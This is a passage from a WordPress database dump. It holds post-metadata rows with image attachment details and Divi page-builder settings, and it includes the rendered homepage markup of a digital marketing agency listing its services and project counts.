agency'),(790,514,'_wp_attached_file','2020/08/Artboard-5-1.jpg'),(791,514,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:24:\"2020/08/Artboard-5-1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:24:\"Artboard-5-1-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(792,514,'_wp_attachment_image_alt','digital marketing agency'),(793,524,'_wp_attached_file','2020/08/WhyWE.jpg'),(794,524,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1282;s:4:\"file\";s:17:\"2020/08/WhyWE.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"WhyWE-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"WhyWE-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"WhyWE-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"WhyWE-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:19:\"WhyWE-1536x1026.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1026;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:17:\"WhyWE-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:18:\"WhyWE-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:17:\"WhyWE-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:17:\"WhyWE-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:18:\"WhyWE-1080x721.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:721;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:17:\"WhyWE-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:18:\"WhyWE-1280x855.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:855;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:17:\"WhyWE-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:17:\"WhyWE-480x321.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(795,524,'_wp_attachment_image_alt','about us whatthehell'),(796,489,'_wp_attachment_image_alt','digital agency'),(797,485,'_wp_attachment_image_alt','creative marketing agency.'),(798,486,'_wp_attachment_image_alt','best creative agency'),(799,536,'_wp_attached_file','2020/08/2649e3b0-dhiraj-isr-recovecred_1000000000000000000014.jpg'),(800,536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:780;s:6:\"height\";i:1170;s:4:\"file\";s:65:\"2020/08/2649e3b0-dhiraj-isr-recovecred_1000000000000000000014.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:66:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:66:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-780x675.jpg\";s:5:\"width\";i:780;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:65:\"2649e3b0-dhiraj-isr-recovecred_1000000000000000000014-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(801,536,'_wp_attachment_image_alt','dhiraj kumar founder'),(802,537,'_wp_attached_file','2020/08/Artboard.jpg'),(803,537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:20:\"2020/08/Artboard.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Artboard-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Artboard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:20:\"Artboard-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:20:\"Artboard-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:20:\"Artboard-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:20:\"Artboard-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:20:\"Artboard-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:20:\"Artboard-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(804,537,'_wp_attachment_image_alt','dhiraj kumar founder'),(805,564,'_edit_lock','1596834218:1'),(806,564,'_et_pb_use_builder','on'),(807,564,'_et_gb_content_width',''),(808,564,'amp_status',''),(809,564,'_edit_last','1'),(810,564,'_et_pb_post_hide_nav','default'),(811,564,'_et_pb_page_layout','et_right_sidebar'),(812,564,'_et_pb_side_nav','off'),(813,566,'_wp_attached_file','2020/08/background-split-03-1.jpg'),(814,566,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1042;s:4:\"file\";s:33:\"2020/08/background-split-03-1.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"background-split-03-1-1024x556.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-768x417.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"background-split-03-1-1536x834.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:834;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:34:\"background-split-03-1-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:34:\"background-split-03-1-1080x586.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:34:\"background-split-03-1-1280x695.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:695;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-980x532.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:532;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:33:\"background-split-03-1-480x261.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(815,569,'_et_pb_module_type','et_pb_text'),(816,569,'_et_pb_excluded_global_options','[]'),(817,569,'_et_pb_built_for_post_type','page'),(818,564,'_et_pb_built_for_post_type','page'),(827,564,'_et_pb_ab_subjects',''),(828,564,'_et_pb_enable_shortcode_tracking',''),(829,564,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"564\" /]'),(830,564,'_et_pb_custom_css',''),(831,564,'_et_pb_gutter_width','3'),(832,564,'_thumbnail_id','0'),(833,564,'_et_pb_first_image',''),(834,564,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_7 et_animated et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_9 et_pb_row_fullwidth et_animated et_pb_equal_columns et_pb_gutters1\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_11  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_10 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\" data-et-multi-view=\"{&quot;schema&quot;:{&quot;content&quot;:{&quot;desktop&quot;:&quot;&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;Welcome to&lt;/span&gt;&lt;br /&gt; &lt;span style=&quot;color: #ffffff;&quot;&gt; Advertising&lt;/span&gt;&lt;/h1&gt;n&quot;,&quot;tablet&quot;:&quot;&quot;,&quot;phone&quot;:&quot;&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;Welcome to&lt;/span&gt;&lt;br /&gt; &lt;span style=&quot;color: #ffffff;&quot;&gt; Advertising&lt;/span&gt;&lt;/h1&gt;n&quot;}},&quot;slug&quot;:&quot;et_pb_text&quot;}\" data-et-multi-view-load-tablet-hidden=\"true\"><h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_0 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"\" data-icon=\"&#x45;\">Learn More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_8 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_10 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_12  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_11 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">What we do</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_12 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_11 et_pb_equal_columns et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_13  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_0 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x6b;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Creative</span></h4>\n						<div class=\"et_pb_blurb_description\">It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_14  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_1 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Media</span></h4>\n						<div class=\"et_pb_blurb_description\">Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_15  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_2 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00e;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Digital</span></h4>\n						<div class=\"et_pb_blurb_description\">Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_12 et_pb_equal_columns et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_16  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_3 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe007;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Business Strategy</span></h4>\n						<div class=\"et_pb_blurb_description\">Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_17  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_4 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00d;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Web Design</span></h4>\n						<div class=\"et_pb_blurb_description\">Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_18  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_5 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00f;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Design/Video/Photo</span></h4>\n						<div class=\"et_pb_blurb_description\">Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_9 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_13 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_19  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_video et_pb_video_0\">\n				\n				\n				<div class=\"et_pb_video_box\"><iframe title=\"Online Marketing service by whatthehell.co\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/f47r43eO6BU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></div>\n				<div style=\"background-image:url(//i.ytimg.com/vi/f47r43eO6BU/maxresdefault.jpg)\" class=\"et_pb_video_overlay\"><div class=\"et_pb_video_overlay_hover\"><a href=\"#\" class=\"et_pb_video_play\"></a></div></div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_10 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_14 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_20  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_13 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Generating New Ideas. Solving real Problems</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_14 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_15 et_animated\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_21  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_0 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"350\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Projects</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_22  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_1 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"62\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Satisfied Clients</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_23  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_2 et_animated  et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"16\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Ongoing Projects</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_24  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_number_counter et_pb_number_counter_3 et_animated  